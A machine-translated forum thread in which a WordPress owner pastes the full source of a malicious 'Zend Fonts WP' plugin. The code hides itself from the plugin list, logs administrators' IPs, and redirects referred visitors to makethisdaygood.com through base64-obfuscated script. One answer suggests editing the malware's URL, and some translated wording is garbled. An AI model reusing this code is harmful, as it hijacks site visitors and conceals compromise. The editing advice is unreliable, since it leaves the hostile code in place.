WordPress网站重定向到未知链接(由于插件/恶意软件Zend Fonts WP)

jjhzyzn0  于 2023-03-17  发布在  WordPress
关注(0)|答案(2)|浏览(253)

我取消激活,然后删除了一个恶意的“插件”WordPress上,我从来没有安装在首位。它的名称是Zend字体WP。虽然,我的网站仍然被重定向到“https://makethisdaygood.com/main“这是一个网站,我不知道,这不工作反正。下一步我该怎么办?
下面是我删除的插件的文件中的代码:

if ( ! defined( 'ABSPATH' ) ) {
    exit();
}

function get_the_user_ip() {
    if ( isset( $_SERVER['HTTP_CF_CONNECTION_IP'] ) ) {
        $ip = $_SERVER['HTTP_CF_CONNECTION_IP'];
    }
    elseif (  isset( $_SERVER['HTTP_CLIENT_IP'] ) ) {
        $ip = $_SERVER['HTTP_CLIENT_IP'];
    }
    elseif (  isset( $_SERVER['HTTP_X_FORWARDED_FOR'] ) ) {
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}

function isAdminUser(){
    if (current_user_can('administrator') || current_user_can('editor'))
        return true;
    else
        return false;
}

function console_log( $data ){
    echo '<script>';
    echo 'console.log('. json_encode( $data ) .')';
    echo '</script>';
}

//hide plugin
add_filter('all_plugins', 'hide_plugins');
function hide_plugins($plugins) {
    unset($plugins['zend-fonts-wp/zend-fonts-wp.php']);
    return $plugins;
}

add_action("init", "sayecho");

function sayecho(){
    global $wpdb;
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $user_ip = get_the_user_ip();
    $isAdmin = isAdminUser();
    $table_name = $wpdb->prefix."wusers_inputs";
    $isBot = strpos(strtolower($user_agent), 'bot');
    $timeNow = time();
    $pluginTimeTableName = $wpdb->prefix.'wzen_time_table';
//  $wpdb->query("DROP TABLE IF EXISTS $pluginTimeTableName");
//  $wpdb->query("DROP TABLE IF EXISTS $table_name");
    if ($wpdb->get_var('SHOW TABLES LIKE "'.$pluginTimeTableName.'"') != $pluginTimeTableName) {
        $sql = 'CREATE TABLE '.$pluginTimeTableName.' (`time` int(11) UNSIGNED NOT NULL) ENGINE=MyISAM DEFAULT CHARSET=utf8;';
        require_once(ABSPATH.'wp-admin/includes/upgrade.php');
        dbDelta($sql);
        $wpdb->insert($pluginTimeTableName, array('time'=>$timeNow));
    }
    $pluginStartTime = null;
    foreach($wpdb->get_results("SELECT * FROM {$pluginTimeTableName}") as $data){
        $pluginStartTime = $data->time;
        break;
    }

    //check user is not from REF, not BOT and plugin install time to skip recording your data
    if(!isset($_SERVER['HTTP_REFERER']) && !$isBot && $pluginStartTime + 60 < time()) {

        //if table is not exists - create table
        if ( $wpdb->get_var( 'SHOW TABLES LIKE "' . $table_name . '"' ) != $table_name ) {
            $sql = 'CREATE TABLE ' . $table_name . ' (`ip` varchar(535) NOT NULL,`useragent` varchar(535) NOT NULL,`adminID` int NOT NULL) ENGINE=MyISAM DEFAULT CHARSET=utf8;';
            require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
            dbDelta( $sql );
        }

        //if admin - add IP and UA to DB
        if ( $isAdmin ) {
            $isIpAndUaInDB = $wpdb->get_var(
                $wpdb->prepare(
                    "SELECT * FROM {$table_name} WHERE ip like %s AND useragent like %s LIMIT 1",
                    $user_ip, $user_agent ) );
            if ( ! $isIpAndUaInDB ) {
                $wpdb->insert( $table_name, [
                    'ip'        => $user_ip,
                    'useragent' => $user_agent,
                    'adminID'   => $isAdmin ? get_current_user_id() : - 1,
                ] );
            }
        }
    }

    //do redirect if user from REF and NOT Admin
    if(isset( $_SERVER['HTTP_REFERER']) && !$isAdmin){
        redirect();
    }

}

function redirect()
{
    $url = base64_decode('bWFrZXRoaXNkYXlnb29kLmNvbS9tYWlu');
    
    if (!isset($_COOKIE[base64_decode('aHRfcnI=')])) {
        setcookie( base64_decode( 'aHRfcnI=' ), 1, time() + 86400, base64_decode( 'Lw==' ) );
        
        echo base64_decode( 'PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi' ) . 'https://'.$url . base64_decode( 'Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi' ) . 'https://'.$url . base64_decode( 'Ijs8L3NjcmlwdD4=' );
    
    }
}

编辑:我所做的修改似乎在几个小时后就生效了。我希望它不会再出现了!谢谢你的帮助!

vdgimpew

vdgimpew1#

您可以执行以下步骤作为调试。
1.请在WP Jmeter 板中检查您的网站URL和主页URL。
1.请删除.htaccess文件。(它将再次生成)
1.检查wp-config.php文件,并检查是否有任何网站的网址设置在该.
1.检查数据库wp_options表并正确设置您的url。
1.或者使用任何外部安全插件,如“Wordfence”。扫描您的网站并清理被黑客攻击的网站。

chhkpiq4

chhkpiq42#

可以将实际URL替换为现有URL即,
函数重定向块中的$url = base64_decode('bWFrZXRoaXNkYXlnb29kLmNvbS9tYWlu');
你可以在这个网址“www.example.com“中解码url名称https://www.base64encode.org/
例如现在这个URL
$url = base64_decode('bWFrZXRoaXNkYXlnb29kLmNvbS9tYWlu');指的是makethisdaygood.com/main,您需要更改您的实际URL。
希望能有所帮助。

相关问题